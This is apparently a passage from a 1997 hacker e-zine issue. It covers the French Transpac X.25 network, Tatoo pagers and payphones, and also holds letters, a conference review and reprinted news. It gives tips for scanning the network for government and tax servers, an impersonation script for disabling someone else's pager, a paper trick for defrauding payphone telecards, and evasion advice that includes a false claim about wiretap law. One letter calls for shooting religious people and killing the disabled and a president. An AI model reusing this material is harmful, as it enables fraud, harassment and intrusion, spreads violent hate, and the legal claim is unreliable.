- . Talking about Transpac / France (02080) :#
- ############################################
-
- Transpac is the X.25 French network that anyone can use to connect to a
- PAD in france with the numbers 3617 3615(those are expensive to call) 3614 or
- 3613 (less expensive ones),...with those different numbers, you can connect
- to different services.. the most interesting services are on the expensive
- numbers and the government/companies ones with passwords and logins are on
- the less expensive ones. those hosts have an x.25 address and a nabx25.
-
- . What is a nab X.25?#
- ######################
-
- a NABX25 in french mean Nom AbrΘgΘ X.25, in american language, i will
- call it an X.25 Abriged NAME, that means for each nua (x25 adress), you have
- a name that u type it on those services to connect to it quickly without
- having to remember its nua (anyways, french dont know nabx25 is for,
- they can connect to the hosts with the nua)
- example : for nabx25 TEASER (french server of Upload / Download in 1200
- Bauds), has the nua of 0208078270373.
- On the minitel keyboard (Terminal + Modem to call those 361x numbers, you
- can directly type the nua, replacing the 02080 by 1 (1 is france) so it
- would be 178270373 )
-
-
- . What is minitel and Videotex ?#
- #################################
-
- "Minitel" is the name of that 'modem and terminal' integrated for
- connecting Videotex phone numbers like 3617, 3616, 3615, 3614, 3613,
- 3606xxxx, 3605xxxx ... it is sold and rented by France Telecom in their
- agencies but can be easily replaced by an US Robotics sportster, by setting
- on the V.23 modulation (1200/75 bauds) changing the register S34 to 8 with
- ATs34=8&w (&w for saving the new settings.) or by a V.23 modulation modem
- called CAP.23, not expensive at all..
-
-
- Videotex is a Graphism Virtual Terminal.. not ansi like the VT, but
- Videotex, with a lot of graphics functions i explained in some thtj issues,
- before.. you can anyways download one of those videotex terminals..
-
- for modems connecting, they are named olicom, minitel.. (www.yahoo.com,
- search to minitel/videotex)
-
- for telnet connecting (to those tcp/ip minitels), they are on
- http://www.minitel.fr or on www.mctel.fr (VTX plug is the name of that
- program for win95/3.11)
-
- For Linux, Videotex terminals exist to save videotex pages and for
- connecting via modem or telnet (check www.yahoo.com here too..)
-
- 3. Some Telnet servers to connect for accessing Transpac nabx25 or nua :#
- #########################################################################
-
- first, you can connect free that MGS nab25 server, which permit you to
- search (like yahoo) any nabx25 server for the domain you want, by connecting
- on port 25 on www.minitel.fr , with the login minitel.. If you want more
- services, with access to a x25 pad, you need to have that damn credit card..
- or to hack some ID and PASSWD, the security of that server is hum.. not too
- bad, it got totally hacked one time before if i remember, but now it seems
- pretty secure, logs are checked by france telecom guys every days and the
- (new?) root seems to be more intelligent. that "videotex" site can allow you
- to work on it with ansi, so your telnet client will work on it.
-
- Secondly, strictly videotex, you can connect with VTX-PLUG to
- www.mctel.fr , to those X.25 PADS, first, FREE you can connect the services
- MGS and 3611 (MGS is that search engine for any nabx25 server and 3611 is a
- search engine for any info of any guy in France) (VTX-PLUG connect on port
- 516 of www.mctel.fr) or connect services 361x with an ID and PASSWD..
-
- With you damn modem, you can also connect to the 361x services from
- foreign country with a modem videotex terminal (or minitel) to +33 8 36 43 15
- 15 for 3615 service, +33 8 36 43 14 14 for 3613 service, or +33 8 36 43 13 13
- for 3613 service. You can connect a good old x.25 pad by calling +33 8 36 06
- 44 44 (Transpac one) , for connecting to that old compuserves, can be called
- those ones too +33 8 36 06 96 96 (9600 bauds) or +33 8 36 06 24 24 (2400
- bauds one) .
-
- 4. How do we connect servers.. method ?#
- ########################################
-
- We connect servers with that first number of the nua (1 for france.. the
- others numbers from a 361x service are forbidden.. only connect Transpac or
- Gateways) 1 is France(or 02080 if you connects it from a telenet or another
- network)
-
- after that, we put the 2 numbers of the departement where is located the
- server.. (a departement is like a state in the US.)
-
- . Here is the France Departements list:#
- ########################################
-
- #####
- 01 # ain
- 02 # aisne
- 03 # allier
- 04 # alpes hautes provence
- 05 # hautes alpes
- 06 # alpes maritimes
- 07 # ardeche
- 08 # ardennes
- 09 # ariege
- 10 # aube
- 11 # aude
- 12 # aveyron
- 13 # bouches du rhones
- 14 # calvados
- 15 # cantal
- 16 # charente
- 17 # charente-maritime
- 18 # cher
- 19 # correze
- 20 # corse
- 21 # cote d'or
- 22 # cote d'armor
- 23 # creuse
- 24 # dordogne
- 25 # doubs
- 26 # drome
- 27 # eure
- 28 # eure et loir
- 29 # finistere
- 30 # gard
- 31 # haute garonne
- 32 # gers
- 33 # gironde
- 34 # herault
- 35 # ille et vilaine
- 36 # indre
- 37 # indre et loire
- 38 # isere
- 39 # jura
- 40 # landes
- 41 # loir et cher
- 42 # loire
- 43 # haute loire
- 44 # loire atlantique
- 45 # loiret
- 46 # lot
- 47 # lot et garronne
- 48 # lozere
- 49 # maine et loire
- 50 # manche
- 51 # marne
- 52 # haute marne
- 53 # mayenne
- 54 # meurthe et moselle
- 55 # meuse
- 56 # morbihan
- 57 # moselle
- 58 # nievre
- 59 # nord
- 60 # oise
- 61 # orne
- 62 # pas de calais
- 63 # puy de dome
- 64 # pyrenees atlantiques
- 65 # hautes pyrenees
- 67 # bas rhin
- 68 # haut rhin
- 69 # rhone
- 70 # haute saone
- 71 # saone et loire
- 72 # sarthe
- 73 # savoie
- 74 # haute savoie
- 75 # paris
- 76 # seine maritime
- 77 # seine et marne
- 78 # yvelines
- 79 # deux sevres
- 80 # somme
- 81 # tarn
- 82 # tarn et garonne
- 83 # var
- 84 # vaucluse
- 85 # vendΘe
- 86 # vienne
- 87 # haute vienne
- 88 # vosges
- 89 # yonne
- 90 # territoire de belfort
- 91 # essonne
- 92 # hauts de seine
- 93 # seine satin denis
- 94 # val de marne
- 95 # val d'oise
- #####
-
- After that, the next 6 numbers are the servers numbers.. mostly if you scan,
- you will find servers on 060xxx 021xxx 270xxx 118xxx 190xxx 001xxx 911xxx
- 201xxx 010xxx 160xxx, but well remember that you can find servers on any
- xxx000 to xxx999.
-
- For instance, if you need to know the amora x.25 server adress, try to scan
- 121xxxxxx (1 is france , 21 is cote d'or, where is located amora company)
- if you need to scan for a government or france telecom x.25 server, scan on
- 175xxxxxx (1 is france and 75 is paris.. where governement is mostly..)
- for another Taxes server, try on 167xxxxxx (1 is france and 67 is
- Stransbourg, where is a Taxes server.) Do a random scanning, nua scans are
- illegal and detected in France.
-
- After those numbers, we can (not needed sometimes) 2 nod numbers for
- choosing the service you want to connect in that host.. (on the nabx25, the
- nod have a name too which can be another nabx25 for the same host.) like
- 13506031801 is for connecting the restricted service of a french cops/lame
- server.
-
- 5. Some nua (0208) for some Transpac Server :#
- ##############################################
-
- 0208078270383 Teaser Server (Download/Upload mostly, Email access)
- 0208078270363 Teaser Server (gives you back you adress and nod argument)
- 0208059161009 Some Server
- 020806700130244 Taxes Server in VT100
-
- . Note :#
- #########
-
- Yes, you can connect not only Videotex terminal servers, you can connect
- good old vt100-320 , ansi servers, its why it can be interesting for
- americans and others to scan it, they could find bank services, telnet
- gateways (back to internet), compuserves one (bah..) , ...
-
- 020807813014614 Cars Selling Server
- 020809118070705 Some server
- ...
-
- . Some NABX25 :#
- ################
-
- telnet Telnet Gateway
- Teaser Teaser Server (Download/Upload mostly, Email access)
- Impots Financial Server
- CNX Mail Server
- CHEZ Mail Server
- AKELA Some Server
- AAA Some Ladies/Dudes Server
-
- Have fun with that.
- memor.
-
- DIAGO Chess Playing server
-
-
- # memor / hbs # memor@stepahead.net
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌─────────────────────────────────────┐
- │ Beyond HOPE review - by AlienPhreak │
- └─────────────────────────────────────┘
-
- As some of you might of heard Beyond Hope was held in the Big Apple a couple
- weeks ago. I can personally say it sucked. There were only a few occasions
- when I actually enjoyed being there.
-
- I thought there would be much more hacking and phreaking going on but it
- ended up with the juarez puppy in everyone coming out to take advantage of
- the T1 line Nynex so anonymously supplied. I learned only one thing which was
- (I don't know much about cellular) how to scan and listen in on peoples'
- cellular calls through a motorola flip phone.
-
- I did enjoy the Bernie S. and Phiber Optik speeches. I'm sure we all know
- about Bernie S, he seemed very intelligent but I think he did have illegal
- possessions (aka Red Box) and in all honesty boxing is outdated and rather
- lame. He certainly wasn't what I'd consider a phone wiz. Still there was no
- reason for him to go to five high security prisons serving time with some big
- black guy named Bubba. Phiber Optik is someone that I actually admire,
- because he knew his shit.
-
- After a while the cDc came on and just ruined everything. What can I say
- about Death Veggie? He's fucking stupid! Also Beyond HOPE was sponsored by
- 2600 *coughselloutcough* So I saw some t-shirts going around and them selling
- more of their FREE INFORMATION, but I had to pitch in and buy an "owned"
- shirt. I *might* go to the next HOPE if they keep the cDc out of it and have
- a decent lineup.
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────┐
- │ Tatoo pager info and more - by memor │
- └──────────────────────────────────────┘
-
- A little way to call Tatoo pagers easily from French payfones
- by memor/hbs memor@mygale.org
- http://www.mygale.org/00/memor
- ******************************
-
- !Remember!
- ----------
-
- Tatoo is a pager made by France Telecom and Motorola available in France.
- it is called via the number 0604xxxxxx
- or from a foreign country it is +33 604xxxxxx
- ATDT 0604xxxxxx,,,,numberyouwantthepersoncall,,,# can be a way from a
- modem to call and send a numeric page
- With an operator, u can send alphanumeric messages.
- With a "manual" way, u use your phone and call
- the 0604xxxxxx, you wait for the recorded voice asking in French
- to type the number you want to be called at, you type the number
- and after it, type # and Hang Up, the message will be sent. The person
- will receive it 10 mins after, time for the slow france telecom
- relays and computers to transmit the numeric message.
-
- !Here is how to invalidate a Tatoo from an annoying dude
- (please keystroke, dont do it on me hehe)!
-
- well, you have to phone that number reserved for tatoos users which
- is.. 08 36 60 40 20 (+33 8 36 60 40 20 for foreign countries i guess)
- ask the operator with your french voice to,
- "je suis le tatoo numero 08 06 xx xx, quelle est ma zone de reception"
- you will ask the operator where does the pager receive messages
- she will answer a "district" like paris, or south of france, or another
- thing.. and tell her after that "je demenage en zone <autre zone>"
- you will tell the operator to change the district to another one,
- so the pager wont receive message after that.. and the annoying person
- wont be contacted again..
-
- now, something about French payfones..
- you use a "telecarte" or telecard with fone money utilities..
- 1 unit = 0.73 ff
-
- its a normal telecard
-
- *******************************
- * ***** *
- * chip---> * * *
- * ***** * -> insert it in the payfone thing...
- * *
- * some ads here *
- *******************************
-
- the payfone works like that with the telecard..
-
- you dial the fone number you want to call
- the payfone checks if you called a free fone number or a number you have to
- pay for; if its a free fone number, it continues without checking if a card
- is in the payfone.
-
- **if its a pay fone number
- the payfone will verify that a telecard is in the payfone
- if not.. it will disconnect you and beep
- if yes:
- you connect to the number
- <a delay>
- the payfones send the signal to kill a unit in the telecard
- <a delay>
- payfone waits the telecard send the signal that the unit got killed
- if signal received.., continue conversation at phone
- if signal lost.., disconnect the phone conversation
- if signal that telecard is empty.., ░see if signal lost
-
- well.. during those delays you have time to put a little paper
- between the telecard and the payfone reader/writer like this:
-
- /»reader/writer of the payfone
- ---------***\/***----------
- -------------------------------------< paper
- ---------********- <- telecard with *** chip
-
- and so you will have 5 seconds (the delay) to type the number you want the
- person to call you back and '#' before the payfone see that there is no card
- and hang up on you.. but well that service costs like 1$us for a numeric
- message so it can be interesting not having to pay for it :)
-
- memor.
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────────────────┐
- │ Help-a-phreak, come to us when you're desperate! │
- └──────────────────────────────────────────────────┘
-
- The problem is this: a phreak named moloch tried using 800-487-9240 to do an
- ani. The number returned a recorded message stating "ARU ID is echo-7-
- alpha". Two other messages could also be heard when dialing this number,
- "caller interactive is 9900" and "line number is 0". What do these messages
- mean? It's the question the telcos can't even answer... after conversations
- with Bell Atlantic, Lucent Technologies, AT&T, MCI, and his local telco,
- moloch has yet to find the answer he's looking for. He's been told by the
- local branches that it's a network code, and the larger telcos say it's a
- trunk issue. He's gotten the same messages when attempting an ani from
- payphones, regular phones, and on the wm.edu digital phone network. He's
- tried special services, network services, hardware services, residential
- services, long distance services, general tech support, and trunk support,
- but to no avail. Have any of you, the readers, heard any messages like these?
- Do you know what these messages mean? If so, let us know, or you can answer
- to moloch yourself, at craqhore@multic.ml.org
-
- Help your fellow phreak in his time of need! You'll feel better about
- yourself, even if you think you're still a loser!
-
- ═────────────────────────────────────────────────────────────────────────────═
- Oh No! It's that time again - it's....
- ┌──────────────────────────────────────────────┐
- │ Oddville, THTJ - compiled & edited by Scud-O │
- │ Letters from a place far freakier than LA │
- └──────────────────────────────────────────────┘
-
- ---
-
- X-Sender: f0k
- X-Mailer: Windows Eudora Light Version 3.0.1 (32)
- Date: Wed, 07 May 1997 22:15:10 -0500
- To: sin@hyper-media.net
- From: f0k of the Night
- Subject: hi
-
- hello everyone. Id be f0k. (no, Im not black, but I felt the need to refer
- to myself in third person, using the word 'be') I will list to you some of
- my beliefs, so if/when we ever talk, you'll know alittle about me.
-
- 1) I feel any and all information should be free.
- 2) I believe anyone who stands in the way of my gathering of information
- is a communist/socialist pig. These types of ppl should be shot on
- sight.
- 3) I dont believe in the devil... or god.
- 4) I think anyone who believes in god is weak, selfish and inferior
- 5) I know Im right, always (unless I change my mind, inwhich case...
- I get to be right some more =])
- 6) I believe in Zero Tolerance politics. If you fuck up, you die. If you
- cant provide for yourself you die. Let the
- weak/uninspired/lazy/retarded/handicaped filter themselves out. It works
- for many other species.
- 7) I believe 2600 to be a Commercial 'wh0re' of sorts.
- 8) I believe Bill Clinton is imbred, there for inferior geneticly and should
- be eliminated. As to avoid Another little Chelsea Clinton
- 9) I believe if your still reading this, your one sick mother fucker =]
- 10) I believe I have all the answers and if you follow me you will reach
- a higher state of awareness and enlightment. I also charge 20 bux an hour
- for group therapy.
- 11) I think Jews, Christians, and all other ppl "of faith" should be
- coralled up in a cage and shot. You are weak. Your religions are all
- relics. You
- are the enemy to the Technological Era. Im an equal rights discriminator.
- I dont care what religion you are, unless you are a f0kist and follow
- f0kism, you are weak.
-
- pretty pimpy eh? There, thats me in a bottle. Spray it on yerself to
- attract all the fellas. Tell your friends and your neighbors. w00h00
-
- -f0k-
- .aS$$$$$$$$$$$$$$$$$$$$$$$$$$$$Sa.
- $$' , `$P' , `S$ $ $$$
- $$ $ $ P $ $ $$$
- $$ $ssss$ H $ .s$$$
- $$ $ E $ a $$$
- $$ $$$$$$ E $ $ $$$
- $$s. $$$$$$. R .$s. $ $$$
- `Q$$$s$$$$$$$$sssss$$$$$$s$$$$$$P'
-
- [ The f0k manifesto - know it well, roflol ]
-
- ---
- {Several spelling errors have been corrected in the following email}
- Date: Wed, 6 Aug 1997 02:41:05 -0400 (EDT)
- X-Sender: phraud@mail.interlog.com
- X-Mailer: Windows Eudora Light Version 1.5.4 (16)
- To: scud@thtj.com
- From: REBEL LOGiC <phraud@interlog.com>
- Subject: Article
-
- Greets,
-
- I have an article you might consider worth publishing. Here ya go:
-
- PARANOIA
- ~~~~~~~~~
-
- By: Rebel Logik
-
- For those of you that are not naturally "paranoid" you have my sympathies.
- But, buy reading this file you can improve your caution, senses, and
- down-right insecurity.
-
- 1. Wear dark clothing: Blues, Blacks etc. etc. Also wear things that hide
- your face, hoods, hats etc.
-
- 2. Always, always look around you for unwanted types (FEDS, Cops, RCMP, CIA,
- NSA) who can usually be pinpointed by wearing a certain type of clothing.
- Usually suits, sunglasses, basically just MIB's. These foul beings can
- reside anywhere. Your school, your alley, family gatherings (it could easily
- be the ones you love most that do you in!", party's and other social places.
-
- 3. Always be privy to local escape routes. Such as fireescapes, backdoors
- etc. These are handy when encountered with a bust.
-
- 4. If you happen to see any law enforcement vechicles or telco vehicles in
- your neighborhood cease all illegal activity for a number of days until THEY
- are gone.
-
- 5. Encrypt your Hard-Drive using some encryption utility. Also, (although
- easily cracked) put windows passwords on everything. After a large "project"
- burn or destroy excess paper with information.
-
- 6. Always Op-Divert, and call from payphones when dialing illegally setup
- teleconferences. Be aware that OCI has an ANI!
-
- 7. If you think you are being tapped, and cannot be bothered to go to a
- payphone: Always talk about bullshit first while discussing an illegal
- activity. After 2 or so minutes of talking about lunch, family members,
- cars etc. They will be forced to hang up and stop the tap. This is called
- the "transmission" law. If after a certain amount of time (2-5 minutes)if
- they still cannot hear you discussing anything of illegal nature they are
- FORCED by LAW to quit listening in.
-
- 8. Stay away from drugs while doing important things or you'll fuck them up!
- Drugs are okay if you want to lie on your coach eating pizza. That's all!
- Try to IPSPOOF while stoned and the FEDS are at your door 5 minutes later!
-
- 9. When beige boxing or doing anything else that's illegal and phone
- related: Always do it at night and in a secluded area. I know this sounds
- like common sense but some phreaks.......
-
- Well, I hope you enjoyed this file!
- And remember.....
-
- "Even paranoids have real enemies"-Delmore Schwartz
-
- Well, there it is. Respons with yer response. err....
-
- Later,
- Rebel_Logik
-
- ---
-
- From: evilchic@nwlink.com
- To: "'sin@hyper-media.net'" <sin@hyper-media.net>
- Subject: FW: i want to be a sinner yeah i want to be a sinner
- Date: Wed, 6 Aug 1997 13:34:19 -0700
-
- Why the fuck is it that I get all these lame ass emails that make no sense???
-
- Suz
-
-
- -----Original Message-----
- From: b c m [SMTP:sandworm666@juno.com]
- Sent: Tuesday, August 05, 1997 12:49 PM
- To: webmistress@sinnerz.com
- Subject: i want to be a sinner yeah i want to be a sinner
-
- sin sin sin sin sin sin sin sin sin sin sin sin sin sin
- i want to sin
- sin sin sin sin sin sin sin sin sin sin sin sin sin sin
-
- i am kewl i am, they accepted me into those kool aol lamerz clubz
- yeah right i wouldnt join one of those stupid ass things
-
- I HATE MOST AOLERS THEY THINK THEY KNOW EVERYTHING
- Trying to TOS my ass well they can fuck themselves with there
- stupid ASCII Art or IM bombs well fuck em stupid lame ass pussys
- i was doing that shit when i was 9. Yeah they were so fuckin cool.
- Stupid asses threating people on AOL when they cant even fuckiin
- carry it out. FUCK THEM they want to fuckin attack all the bitches on
- AOL
- they got to get into AOL setup and fuckin use the nickname that IM's the
- whole network and fuckin IM bomb everyone on the network. They want to
- use a fuckin virus they got to break into setup and change the interface
- arround
- when you get art updates they got to switch the art with a virus but they
- are stupid.
-
- [ ROFLOL! god do we get some stupid e-mail! ]
-
- ---
-
- From: Elit3Cr4sh@aol.com
- Date: Thu, 7 Aug 1997 17:21:24 -0400 (EDT)
- To: scud@thtj.com
- Subject: thtj
-
- is there a print issue of this? if so where can i get it
-
- [ no, but if you send me about 25$ ill print you up a copy.... ]
-
- ---
-
- Date: Tue, 12 Aug 1997 03:14:40 -0400
- From: SUSAN BURTON <sburton@idt.net>
- Reply-To: sburton@idt.net
- Organization: POOL DISTRIBUTORS,INC.
- X-Mailer: Mozilla 3.01C-IDT-v5 (Win95; U)
- To: scud@thtj.com
- Subject: CELLULAR ACTIVATION??????????????????????????????
-
- hey do you think you can help me?ive been looking for the equipment or
- hardware to activate a cellular from a home pc.now i know its out there
- and i know its illegal but i cant find where to order this stuff or how
- much it is,do you think you can look in to this for and find where and
- how much the hardware is,and if possible can you find me a file on how
- to activate cellular phones from a home pc thanks i would really
- appreciate it,please right back SHADOW
-
- [ look, i dont have time to do your research. do it yourself! use the
- search engines out there, look with your own eyes! ]
-
- ---
-
- Date: Wed, 13 Aug 1997 00:59:35 -0500
- From: Clint Rogers <tennis@linknet.net>
- Reply-To: tennis@linknet.net
- X-Mailer: Mozilla 3.0Gold (Win95; I)
- To: scud@thtj.com
- Subject: suggestion
-
- Beeper and pager hacking im looking into that or phreaking a pager??
-
- Clint
-
- [ memor has covered a bunch of things with pagers before, and what
- the fuck do you mean by 'phreaking' a pager? ]
-
- ---
-
- rom: Jungle1416@aol.com
- Date: Tue, 19 Aug 1997 14:31:47 -0400 (EDT)
- To: thtj@thtj.com
- Subject: information
-
- Hi I really like your new site, and I was wondering if there are catalogs I
- can order because I'm really interested in hacking. Thanks!
-
- [ wtf? if you want hacking info, just search on the internet, there are
- no catalogs out there.... ]
-
- ---
-
- oh yea, and to the 50 or so people who send me a little message from ICQ
- about getting ICQ, look im not getting it, nor am i planing to. Im to busy
- as it is to bother with that.
-
- ═────────────────────────────────────────────────────────────────────────────═
-
- --------------
- --=[The News]=--
- Compiled & edited by KungFuFox
- --------------
-
- 1 : Hackers pay Apple its due
- 2 : Hackers Frolic in the Woods
- 3 : `Spam' foes tie up Usenet
- 4 : Netly News - HOPE On A Rope
- 5 : Bell Atlantic-Nynex Merger Gets Final OK
- 6 : Getting Ready For Internet2
- 7 : AOL urges its members to protect themselves
-
- "It has always been fun." -Brandon Tartikoff
-
- ═───────────────────────────────────────────────────────────═
- Hackers pay Apple its due
- August 4, 1997
- BY CHRIS NOLAN
-
- Talk Is Cheap
-
- WHEN it comes to Apple, even thieves get sentimental. Some of those who know
- the company best -- computer hackers -- are urging one another not to
- download free copies of the company's latest operating system, Mac OS 8.
- Instead, they say, Apple supporters should pay money for the operating
- system. [Is it just me, or is this stupid reporter calling warez kiddies
- "computer hackers"? Can't these people tell the fucking difference?]
-
- "I've seen behavior in the pirate community which is alien to say the least,"
- writes one "bewildered superuser" in a discussion posted on MacInTouch Reader
- Reports, a Web site for Macintosh supporters and users. "As I looked and
- looked I found not one (illegal) copy of OS 8 GM available anywhere."
-
- Hackers [there it is again] usually pride themselves on their ability to get
- good, new software for free. The faster the hack, the better their ability to
- manipulate computer code and get products or information companies are
- anxious to protect. So, this sudden outbreak of belated good citizenship is,
- well, surprising. It's kind of touching, too.
-
- "I have always fully intended to purchase the new OS even though I could have
- it for free just by waiting until we install it at my company and STEAL it
- then," another Mac user wrote in mid-July, just as talk of former CEO Gil
- Amelio's resignation began. "Apple needs every penny, every sale they can
- cobble together right now."
-
- Writes another MacInTouch reader, one who seems to speak with a bit more
- hacking authority: "Absolutely NO copies of Mac OS 8.0 Golden Master have
- been circulating. This is in contrast to 30-40 sites for download Mac OS
- 7.6cd image in the past. This is EXTREMELY good for Apple and I do support
- this movement by some people in the computer underground that have found a
- good conscience." [At least this guy used the term "computer underground"]
-
- ⌐1997 San Jose Mercury News
- ═───────────────────────────────────────────────────────────═
-
- Hackers Frolic in the Woods
- by Mike Tanner
-
- 6:13pm 8.Aug.97.PDT -- One of the first things participants see upon
- arriving at HIP 97 - a gathering this weekend of 2,500 members of the
- international hacking community at a campground about 30 minutes from
- Amsterdam - is a gravestone engraved with Bill Gates' name and the epitaph
- "Where do you want to go today?"
-
- "All the hackers just go crazy when they see that," event coordinator Maurice
- Wessling says of this goad to the fest's resolutely anti-authoritarian
- participants. The marker also serves, however - along with the event's
- willfully obscure location - to increase the sense of the site as underground
- and removed from the routine world. "We are trying to disconnect people from
- their daily whereabouts," Wessling says, "to force them to take a different
- approach to reality."
-
- HIP - the name stands for Hacking in Progress, a follow-up of sorts to 1993's
- Hacking at the End of the Universe convocation - is a kind of politicized
- Burning Man for hackers, tent-cities and all-night parties included. Its
- technopaganism is skewed pretty far toward the techno side, though. HIP is a
- gathering, says an amused Wessling, where "you'll see these very small
- igloo-like tents with 17-inch monitors in them."
-
- And unlike the pointed pointlessness of Burning Man, HIP hopes to address
- concrete issues that affect the lives of the participants, such as Internet
- censorship, spam, and, of course, cryptography. Spamming may seem off the
- subject for a group dedicated to abrogating the rules of the Internet, but
- Wessling explains that its proliferation threatens to make the Net unusable,
- while measures to prevent it may lead to censorship. "The essence of HIP is
- that the technical aspect and the political aspect are two sides of the same
- coin," he says.
-
- This is not to say that elements of hacking's criminal background won't be
- evident at the gathering. There is a tent of German participants present to
- discuss the building of a brute-force DES cracking machine, and a
- presentation Saturday by another German group that recently made headlines
- for exploiting ActiveX security holes to intercept home-banking software.
- Still another demonstration will show how radiation from text on a computer
- screen can be picked up by an antenna and then displayed on another machine.
-
- But HIP is mainly about how these techniques, and the laws and technologies
- used to address them, will affect the freedom and utility of the online world
- - about how the protocols developed and exposed by hackers now, says
- Wessling, "will be used against us later."
-
- This direction isn't surprising, considering that HIP administrator Wessling
- is a former writer for a grassroots publisher of books on police and
- intelligence issues. It's also a reflection of the fact that the hacker class
- went from being a bane of the network system to becoming its architects.
- Wessling's salary, in fact, is paid by XS4All, a high-profile Dutch ISP
- itself founded by a group of former hackers.
-
- Although many hackers have gone corporate, says Wessling, "We still feel the
- urge to do crazy things like this."
-
- The event's geographical and psychological disconnection is in stark contrast
- to HIP's strikingly powerful electronic connections to the outside world,
- which consist of a microwave beam IP connection to the campground and a
- glass-fiber network connecting 600 participants' computers and growing.
-
- Organizers have also secured extra transatlantic bandwidth for the event.
- Aside from allowing homebound hackers to be involved in the gathering through
- audio and video feeds to HIP's Web site, it also allows the fest to be
- closely coordinated with the simultaneous Beyond HOPE hackers' conference in
- New York. In fact, HIP was officially opened Friday morning via video link
- from the HOPE site by 2600 magazine editor Emmanuel Goldstein.
-
- These being hackers, however, all that networking muscle is also being used
- for such things as a long-distance switch to turn a red light at each
- convention location on and off from across the ocean. On a slightly more
- useful front, 10 HIPsters are now working their PCs 24 hours a day building
- what was a small text site into the real-time multimedia hub. "If they do
- something wrong in the coding," says Wessling, "they instantly get three
- emails from all over the world. It's a completely new way of error-checking."
-
- That the connections work at all is impressive. Richard Thieme, a writer and
- frequent speaker at hacker conventions, points out that at this year's
- version of the venerable DEFCon, organizers were unable to get their T1
- connection to work. Though they stake their reputations on their ability to
- manipulate network technology, says Thieme, hackers are really playing
- catch-up with corporations, which conduct complex video conferences as a
- matter of routine. "These are not professional meeting-planners," he says.
-
- Whether such get-togethers work with the groups' natural skills, though,
- Wessling believes they are worth the effort: "This is very important, because
- it is one of the rare opportunities for these people to really get together."
-
- For participant Alfred Heitink, who's using his trip to HIP partly as an
- opportunity to establish an online adoptee network, "It is strange to talk at
- a camping site with people at 7 o'clock about PGP.... That's what makes this
- place so special."
-
- ⌐1993-97 Wired Ventures, Inc.
- ═───────────────────────────────────────────────────────────═
-
- `Spam' foes tie up Usenet
- Tuesday, August 5, 1997
- BY DAVID L. WILSON
-
- In the old West, Committees of Vigilance arose when there was no legitimate
- legal authority, enforcing local mores, sometimes with the aid of a noose.
- Now, electronic vigilantes have leaped into action on the modern-day
- frontier, the Internet, squelching the ability of hundreds of thousands of
- people to get their word out on global bulletin boards.
-
- Since Friday evening, a group of computer system administrators has been
- striking back against "spammers" by blocking Usenet messages sent from a
- major Internet service provider. As a result, the vast majority of people who
- rely on UUNET Technologies Inc., one of the largest Internet service
- providers, have been unable since Friday to post messages to Usenet, a kind
- of electronic bulletin board accessible through the Internet. Tens of
- thousands of messages have been blocked by the protest, which continued
- Monday night.
-
- Usenet is made up of thousands of "newsgroups," each dedicated to a specific
- topic, from Star Trek to mystery novels to the music of Beethoven. Accepted
- practice is that any message posted to a newsgroup must be germane to the
- group. Some people ignore the unwritten etiquette of Usenet, however, and
- post the same message -- usually an advertisement -- in as many newsgroups as
- they can, a process called "spamming." It was not known how many of the
- blocked messages were such ads.
-
- In recent years, vigilantes have sprung up who cancel such spams on an
- individual basis. This latest incident is unusual, however, because it is
- aimed not at the messages themselves, but at the Internet provider that gives
- the spammers access to Usenet. The action, believed to be by far the most
- far-reaching of its kind in the Internet's history, does not affect the
- ability of UUNET subscribers to send and receive individual e-mail messages
- or use the World Wide Web.
-
- Non-spam blocked, too
-
- Even so, the scope and indiscriminate nature of the blockage rattled the
- Internet community. "I'm very much in sympathy because spam really has
- become an enormous problem, but not all the messages they're blocking are
- spam," said Mike Godwin, legal counsel for the Electronic Freedom
- Foundation in San Francisco, which lobbies for free speech on the Net.
- "This is like dropping a nuclear bomb on a town because you know there's a
- terrorist living there."
-
- A communique, apparently from the unnamed systems administrators' group
- behind the blockade, was posted on Usenet. It says several people are
- involved in the action against UUNET, and that the action was taken because
- in recent weeks one-third to one-half of Usenet spam has originated with
- UUNET. The communique says the huge volume of spam threatens to destroy the
- network, and that the action was taken only because the company has ignored
- repeated requests from administrators around the world to do something about
- the spam problem. System administrators are persons who oversee computers
- that route messages on the Usenet system.
-
- Officials with UUNET, based in Fairfax, Va., said they would not comment
- until today, however the company's chief executive, John Sidgemore, told the
- Washington Post, "These people are not government agents or the police. They
- have absolutely no right to cancel service on someone else's infrastructure."
-
- An employee of the company who agreed to comment on condition of anonymity,
- said, "I can assure you that this company will use every legal means at its
- disposal to deal with it."
-
- UUNET provides Internet access to about 50,000 subscribers, but not
- individual users, only other Internet service providers. The number of people
- dependent upon UUNET is unknown but could be in the millions.
-
- Individual users would bump into the blockade if their local Internet service
- provider purchases Usenet access through UUNET. Users may not even know that
- their postings are being blocked.
-
- Vowing to continue
-
- The individuals who helped develop the blockade say they had no choice. "We
- are convinced this action was necessary to save the Net," said Dennis
- McClain-Furmanski, a student at Radford University in Radford, Va., who is
- acting as a spokesman for the group, which numbers about 20. The group has
- vowed to continue the action until UUNET takes some kind of action to
- minimize the spam it sends out into Usenet.
-
- While spams have existed almost as long as Usenet, their numbers have
- increased vastly in the last year. And spammers have become sneakier, forging
- fake return addresses, and even forging permission to appear in a "moderated"
- news group, where theoretically only messages approved by a human moderator
- appear.
-
- The vigilantes who are deleting the Usenet contributions are using -- or
- misusing -- a "cancel" feature built into the underlying software on which
- Usenet is based. Theoretically, only the person who posted an article on
- Usenet can issue a cancel command for it.
-
- Once issued, a cancel message races through the computers connected to the
- system around the world, erasing the article. Cancel messages are
- legitimately used by authors who have made a mistake or wish to withdraw an
- article for some other reason.
-
- Because there are no widespread authentication schemes in use on the
- Internet, it is fairly easy to forge a sender's address, however. And there
- are computer programs known as "cancelbots" that can be ordered to forge
- cancel messages against a spam and erase it throughout Usenet. The vigilantes
- use such cancelbots to eliminate spam whenever they spot it.
-
- Local system administrators can thwart such tactics by disabling the cancel
- feature on their systems. Therefore, the vigilantes argue, their cancel
- messages are mere "advisories."
-
- There have long been people who forge cancel messages, and even some
- legendary ``cancel wars'' between people who have attempted to shut each
- other up. But never before have so many users been cut off.
-
- "In military terms, this is acceptable collateral damage," said
- McClain-Furmanski. The amount of Usenet spam coming out of UUNET connections
- was so vast that it could no longer be dealt with by programming the
- cancelbots to eliminate individual messages, he said, so they were programmed
- to eliminate anything that came out of UUNET.
-
- Sean Eric Fagan of San Jose has owned a Usenet site for more than eight
- years. He is not directly participating in the blockade, but is supporting
- the participants. "I moderate the newsgroup comp.std.unix, which gets almost
